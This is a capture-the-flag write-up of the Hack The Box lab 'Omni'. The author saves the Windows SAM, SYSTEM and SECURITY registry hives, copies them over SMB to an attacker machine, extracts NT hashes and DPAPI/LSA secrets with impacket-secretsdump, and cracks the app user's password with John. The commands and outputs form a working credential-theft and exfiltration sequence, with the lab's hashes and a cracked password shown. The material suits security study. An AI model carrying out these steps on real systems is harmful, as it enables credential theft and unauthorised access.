InfoSec LAB

Omni_Hashdump

Created: 3 min read

Assessment

I was thinking about how I can go about to decrypt those encoded PSCredential objects that I enumerated earlier, because those encoded PSCredential objects are encrypted before-hand with the corresponding user’s password.

Encoding itself was done just to store the encrypted PSCredential object in a string representation.

In order for me to decrypt those PSCredential objects, I would need to have the corresponding users password.

But then I realized that I AM the SYSTEM with the full administrative privileges. I do not need to worry about finding vulnerabilities to exploit to either make a lateral movement or privilege escalation as I am already the SYSTEM.

I can just dump the Windows Authentication Data (SAM, SYSTEM, SECURITY) with my privileges

Windows Authentication Data

PS C:\Data\tmp> reg save HKLM\SAM sam
The operation completed successfully.
PS C:\Data\tmp> reg save HKLM\SYSTEM system
The operation completed successfully.
PS C:\Data\tmp> reg save HKLM\security security
The operation completed successfully.

Just like that. I CAN do that because I am the SYSTEM

PS C:\Data\tmp> copy sam \\10.10.14.5\smb\
PS C:\Data\tmp> copy system \\10.10.14.5\smb\
PS C:\Data\tmp> copy security \\10.10.14.5\smb\

I will then transport them to Kali over SMB

Hashdump

┌──(kali㉿kali)-[~/…/htb/labs/omni/3S]
└─$ impacket-secretsdump LOCAL -sam sam -system system -security security -outputfile hashdump
Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation
 
[*] target system bootkey: 0x4a96b0f404fd37b862c07c2aa37853a5
[*] dumping local sam hashes (uid:rid:lmhash:nthash)
administrator:500:aad3b435b51404eeaad3b435b51404ee:a01f16a7fa376962dbeb29a764a06f00:::
guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
defaultaccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
wdagutilityaccount:504:aad3b435b51404eeaad3b435b51404ee:330fe4fd406f9d0180d67adb0b0dfa65:::
sshd:1000:aad3b435b51404eeaad3b435b51404ee:91ad590862916cdfd922475caed3acea:::
devtoolsuser:1002:aad3b435b51404eeaad3b435b51404ee:1b9ce6c5783785717e9bbb75ba5f9958:::
app:1003:aad3b435b51404eeaad3b435b51404ee:e3cb0651718ee9b4faffe19a51faff95:::
[*] dumping cached domain logon information (domain/username:hash)
[*] Dumping LSA Secrets
[*] DPAPI_SYSTEM 
dpapi_machinekey:0xdc2beb4869328393b57ea9a28aeff84932c3e3ef
dpapi_userkey:0x6760a0b981e854b66007b33962764d5043f3d013
[*] NL$KM 
 0000   14 07 22 73 99 42 B0 ED  F5 11 9A 60 FD A1 10 EF   .."s.B.....`....
 0010   DF 19 3C 6C 22 F2 92 0C  34 B1 6D 78 CC A7 0D 14   ..<l"...4.mx....
 0020   02 7B 81 04 1E F6 1C 66  69 75 69 84 A7 31 53 26   .{.....fiui..1S&
 0030   A3 6B A9 C9 BF 18 A8 EF  10 36 DB C2 CC 27 73 3D   .k.......6...'s=
nl$km:140722739942b0edf5119a60fda110efdf193c6c22f2920c34b16d78cca70d14027b81041ef61c6669756984a7315326a36ba9c9bf18a8ef1036dbc2cc27733d
[*] Cleaning up...

I can dump hashes using impacket-secretsdump

Password Cracking

┌──(kali㉿kali)-[~/…/htb/labs/omni/3S]
└─$ john hashdump.sam --wordlist=/usr/share/wordlists/rockyou.txt --format=NT
Using default input encoding: UTF-8
Loaded 6 password hashes with no different salts (NT [MD4 128/128 AVX 4x3])
Warning: no OpenMP support for this hash type, consider --fork=3
Press 'q' or Ctrl-C to abort, almost any other key for status
                 (Guest)     
mesh5143         (app)     
2g 0:00:00:00 DONE (2023-02-03 19:05) 2.898g/s 20787Kp/s 20787Kc/s 91283KC/s      markinho..*7¡Vamos!
Warning: passwords printed above might not be all those cracked
Use the "--show --format=NT" options to display all of the cracked passwords reliably
Session completed.

I cracked the password hash for the app user with john this time. The cracked password hash is mesh5143

Interactive Graph View

Backlinks